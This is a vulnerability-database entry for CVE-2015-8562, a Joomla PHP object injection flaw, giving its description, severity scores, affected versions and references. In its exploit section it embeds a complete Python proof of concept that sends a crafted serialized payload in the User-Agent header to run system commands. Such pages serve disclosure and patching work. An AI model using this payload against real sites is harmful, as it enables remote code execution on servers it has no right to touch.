CVE-2015-8562 : Detail

CVE-2015-8562

A03-Injection
96.65%V3
Network
2015-12-16
20h00 +00:00
2018-10-09
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 38977

Publication date : 2015-12-14 23h00 +00:00
Author : Sec-1
EDB Verified : Yes

''' Simple PoC for Joomla Object Injection. Gary @ Sec-1 ltd http://www.sec-1.com/ ''' import requests # easy_install requests def get_url(url, user_agent): headers = { 'User-Agent': user_agent } cookies = requests.get(url,headers=headers).cookies for _ in range(3): response = requests.get(url, headers=headers,cookies=cookies) return response def php_str_noquotes(data): "Convert string to chr(xx).chr(xx) for use in php" encoded = "" for char in data: encoded += "chr({0}).".format(ord(char)) return encoded[:-1] def generate_payload(php_payload): php_payload = "eval({0})".format(php_str_noquotes(php_payload)) terminate = '\xf0\xfd\xfd\xfd'; exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' injected_payload = "{};JFactory::getConfig();exit".format(php_payload) exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate return exploit_template pl = generate_payload("system('touch /tmp/fx');") print get_url("http://172.31.6.242/", pl)

Products Mentioned

Configuraton 0

Joomla>>Joomla\! >> Version 1.5.0

Joomla>>Joomla\! >> Version 1.5.1

Joomla>>Joomla\! >> Version 1.5.2

Joomla>>Joomla\! >> Version 1.5.3

Joomla>>Joomla\! >> Version 1.5.4

Joomla>>Joomla\! >> Version 1.5.6

Joomla>>Joomla\! >> Version 1.5.7

Joomla>>Joomla\! >> Version 1.5.8

Joomla>>Joomla\! >> Version 1.5.9

Joomla>>Joomla\! >> Version 1.5.10

Joomla>>Joomla\! >> Version 1.5.11

Joomla>>Joomla\! >> Version 1.5.12

Joomla>>Joomla\! >> Version 1.5.13

Joomla>>Joomla\! >> Version 1.5.14

Joomla>>Joomla\! >> Version 1.5.15

Joomla>>Joomla\! >> Version 1.5.16

Joomla>>Joomla\! >> Version 1.5.17

Joomla>>Joomla\! >> Version 1.5.18

Joomla>>Joomla\! >> Version 1.5.19

Joomla>>Joomla\! >> Version 1.5.20

Joomla>>Joomla\! >> Version 1.5.21

Joomla>>Joomla\! >> Version 1.5.22

Joomla>>Joomla\! >> Version 1.5.23

Joomla>>Joomla\! >> Version 1.5.24

Joomla>>Joomla\! >> Version 1.5.25

Joomla>>Joomla\! >> Version 1.5.26

Joomla>>Joomla\! >> Version 1.6.0

Joomla>>Joomla\! >> Version 1.6.1

Joomla>>Joomla\! >> Version 1.6.2

Joomla>>Joomla\! >> Version 1.6.3

Joomla>>Joomla\! >> Version 1.6.4

Joomla>>Joomla\! >> Version 1.6.5

Joomla>>Joomla\! >> Version 1.6.6

Joomla>>Joomla\! >> Version 1.7.0

Joomla>>Joomla\! >> Version 1.7.1

Joomla>>Joomla\! >> Version 1.7.2

Joomla>>Joomla\! >> Version 1.7.3

Joomla>>Joomla\! >> Version 1.7.4

Joomla>>Joomla\! >> Version 1.7.5

Joomla>>Joomla\! >> Version 2.5.0

Joomla>>Joomla\! >> Version 2.5.1

Joomla>>Joomla\! >> Version 2.5.2

Joomla>>Joomla\! >> Version 2.5.3

Joomla>>Joomla\! >> Version 2.5.4

Joomla>>Joomla\! >> Version 2.5.5

Joomla>>Joomla\! >> Version 2.5.6

Joomla>>Joomla\! >> Version 2.5.7

Joomla>>Joomla\! >> Version 2.5.8

Joomla>>Joomla\! >> Version 2.5.9

Joomla>>Joomla\! >> Version 2.5.10

Joomla>>Joomla\! >> Version 2.5.11

Joomla>>Joomla\! >> Version 2.5.12

Joomla>>Joomla\! >> Version 2.5.13

Joomla>>Joomla\! >> Version 2.5.14

Joomla>>Joomla\! >> Version 2.5.15

Joomla>>Joomla\! >> Version 2.5.16

Joomla>>Joomla\! >> Version 2.5.17

Joomla>>Joomla\! >> Version 2.5.18

Joomla>>Joomla\! >> Version 2.5.19

Joomla>>Joomla\! >> Version 2.5.20

Joomla>>Joomla\! >> Version 2.5.21

Joomla>>Joomla\! >> Version 2.5.22

Joomla>>Joomla\! >> Version 2.5.23

Joomla>>Joomla\! >> Version 2.5.24

Joomla>>Joomla\! >> Version 2.5.25

Joomla>>Joomla\! >> Version 2.5.26

Joomla>>Joomla\! >> Version 2.5.27

Joomla>>Joomla\! >> Version 2.5.28

Joomla>>Joomla\! >> Version 3.0.0

Joomla>>Joomla\! >> Version 3.0.1

Joomla>>Joomla\! >> Version 3.0.2

Joomla>>Joomla\! >> Version 3.0.3

Joomla>>Joomla\! >> Version 3.1.0

Joomla>>Joomla\! >> Version 3.1.1

Joomla>>Joomla\! >> Version 3.1.2

Joomla>>Joomla\! >> Version 3.1.3

Joomla>>Joomla\! >> Version 3.1.4

Joomla>>Joomla\! >> Version 3.1.5

Joomla>>Joomla\! >> Version 3.1.6

Joomla>>Joomla\! >> Version 3.2.0

Joomla>>Joomla\! >> Version 3.2.1

Joomla>>Joomla\! >> Version 3.2.2

Joomla>>Joomla\! >> Version 3.2.3

Joomla>>Joomla\! >> Version 3.2.4

Joomla>>Joomla\! >> Version 3.3.0

Joomla>>Joomla\! >> Version 3.3.1

Joomla>>Joomla\! >> Version 3.3.2

Joomla>>Joomla\! >> Version 3.3.3

Joomla>>Joomla\! >> Version 3.3.4

Joomla>>Joomla\! >> Version 3.4.0

Joomla>>Joomla\! >> Version 3.4.1

Joomla>>Joomla\! >> Version 3.4.2

Joomla>>Joomla\! >> Version 3.4.3

Joomla>>Joomla\! >> Version 3.4.4

Joomla>>Joomla\! >> Version 3.4.5

References

https://www.exploit-db.com/exploits/39033/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.exploit-db.com/exploits/38977/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/79195
Tags : vdb-entry, x_refsource_BID